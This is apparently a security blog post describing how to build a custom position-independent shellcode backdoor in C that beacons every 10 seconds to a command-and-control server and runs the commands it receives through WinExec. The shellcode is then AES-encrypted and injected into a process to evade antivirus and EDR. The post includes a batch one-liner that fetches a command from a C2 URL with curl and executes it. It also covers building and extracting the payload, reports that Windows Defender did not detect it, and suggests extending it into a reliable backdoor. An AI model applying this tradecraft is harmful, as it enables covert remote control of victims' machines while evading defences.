Shellcode injection is one of the most used defence evasion technique because shellcode is injected into a volatile memory therefore there are no traces left of any exploitation. Apart from the injector itself, shellcode injection can be called fileless or partial fileless malware. Since there are no files being dropped on the system therefore the chances of detection are very few. However, shellcodes generated by tools like msfvenom are highly detectable due to updated signatures. But what if a custom shellcode has been created and injected in the memory. The signatures of custom shellcodes are unknown to AV/EDR, moreover shellcodes are machine instructions that are very hard to analyse in a victim process having thousands of lines of machine code. The only detection that could be possible is the use of injection APIs on which EDRs have added hooks but there is a separate discussion on how to bypass this API hooking. A detailed analysis and blog has been posted by my colleague who used syscalls to bypass API hooking that is provided below:
If a high quality injector that uses syscalls and bypass API hooking injects a custom shellcode in the memory of victim process then the detection rate is reduced to 5 percent as per current technology. In this blog we will focus on creating custom shellcodes and show why a custom shellcode is the epitome of defence evasion?
One problem that everyone face while writing a custom shellcode is that it is a very tedious process of writing position independent code in assembly language and then linking the assembly language to an executable after which the shellcode could be extracted from that binary. However, I’ve came across a very good paper by hasherezade, that uses visual studio to generate assembly from a c/cpp project and then from assembly to shellcode.
I will follow the methodology provided by hasherezade to create a custom position independent backdoor communicating on a c3 over https protocol to execute batch commands in the victim system. The shellcode will be a beacon type payload that communicates the c3 after every 10 seconds. The first requirement for creating a custom shellcode is to write position independent code which means that no external libraries or dependencies must be used in the binary. Luckily, hasherezade provided a header file in her github repo where she defined two main functions namely, get_module_by_name for loading libraries like kernel32.dll or user32.dll and get_func_by_name for resolving the address of functions present in the available modules. In my c/cpp code, I just have to add this header file and resolve two functions called LoadLibraryA and GetProcAddress from the module kernel32.dll. Once these functions have been successfully resolved, I can load any module using LoadLibraryA function and call any function from the loaded module using GetProcAddress function.
For creating a position independent code, the whole code must be in a single section like .text section of the generated binary so that it could be easily extracted. It means that I cannot use the string variables or char arrays directly because they are saved in the .data section of the binary. I must either inline the strings or type stack based strings that are automatically saved in the .text section of the binary.
The next step is to load the addresses of LoadLibraryA and GetProcAddress by adding the module of kernel32.dll in the code using hasherezade’s provided header file called peb_lookup.h.
Now that I have found the addresses of LoadLibraryA and GetProcAddress in their respective variables, I can add any module that I want and call any API that I need. Same as the method of function call obfuscation, I’m now indirectly resolving API imports. For executing commands on the system I decided to resolve WinExec API. For indirectly loading all these APIs using the functions address, the function definitions are needed which I looked up at the MSDN documentation page of Microsoft.
Now this code is completely position independent that uses APIs of LoadLibraryA, GetProcAddress, WinExec and Sleep from kernel32 module without using the import address table of binary for resolving these imports. Since, I have access to the WinExec function API, I can use command line to communicate to the server with simple curl command for this PoC. On the server side, I’ve added a php script on a public domain that takes an input which is the command that I want to execute on the system and it saves that command on a subdomain which is communicated by my shellcode to GET and execute the command in the victim pc.
This is a simple command and control server that takes a command as input and update it on a specific subdomain which is contacted by my shellcode after every 10 sec to receive command and execute on the infected system. Thus making it a beacon type backdoor in the system. I simple put WinExec in a while(true) loop with Sleep of 10 sec.
The batch command that I use for communicating the subdomain to GET command is provided below:
for /f “delims=” %i in (‘curl URL_HERE’) do set output=%i && %i
My position independent beacon backdoor code is completed, I will now convert this c code into assembly and from assembly to the shellcode. I will use visual studio dev command prompt for compiling the c/cpp code into assembly language using MSVC. In the dev prompt, I entered the command that uses cl.exe to generate assembly listing from a source file.
Now the .asm file has been created, I need to resolve a few syntax errors and add 16-byte stack alignment for x64 version shellcode that I picked from PIC_Bindshell. Also removed external dependencies and resolved some syntax error like adding square brackets to mov rax, QWORD PTR gs:[96].
Assembly is generated from the c code, now I will link this assembly to an executable with AlignRSP proc as my start function which first align the stack as 16-bytes and then call the main function. If the generated binary executes without errors then the shellcode will also be in working condition. Lets check it out.
The command for generating binary from assembly listings is provided below:
“C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.30133\bin\Hostx64\x64\ml64.exe” backdoor.asm /link /entry:AlignRSP
The generated binary is receiving commands from the server and executing on the victim system. As I gave command of “start calc” on the command and control server so the binary got that command and poped open a calculator on the victim machine. The next step is to extract shellcode from .text section of this position independent binary. For extracting shellcode I’m using CFF explorer suite. It is very simple, need to open binary in cff explorer, go to the text section and copy all hex code.
To test the shellcode I will inject it in some process using my own created injector called Donut which saves encrypted shellcode in its .data section and decrypt the shellcode before injecting in the process. The encrypted shellcode reduces the chance of detection further. For encryption of shellcode I’ve created another custom AES shellcode encryptor which takes a shellcode .bin file and encrypt it using some key. In the screenshot below, you can see the tool that encrypts the shellcode.
I will save this encrypted shellcode in my Donut injector. The code of donut injector is available on my Github page. This injector creates a process and inject the code inside that process and start it as a new thread. When this injector is executed a calculator will be poped open on the screen because I’ve provided a command for starting calculator on the command & control server. I will also change the command on c3 server to open some other application like paint and see weather it is executed on the system or not?
As you can see any command given on the command & control is being executed on the system. The code for position independent backdoor has been provided on my github repository. A detailed video has also been provided in the link below:
Conclusion
Windows defender has not been able to detect anything malicious from injecting custom shellcode in the processes. The conclusion to this article is that if a custom shellcode is being used with a high quality injector then the detection rate of malware is reduced to very low. The analysis of the malware is even harder if the custom shellcode is injected in the process and the injector deletes itself. This is just a PoC proving the point that commands can be executed remotely on the victim system by a number of ways. The code could be further modified into returning the output of each command back to the c3 server thus making it a reliable backdoor. The injector has also been scanned on malware scanners like antiscan.me and the result is very promising.
Author:
Shayan Ahmed Khan,
Reverse Engineer, Cytomate
REFERENCES: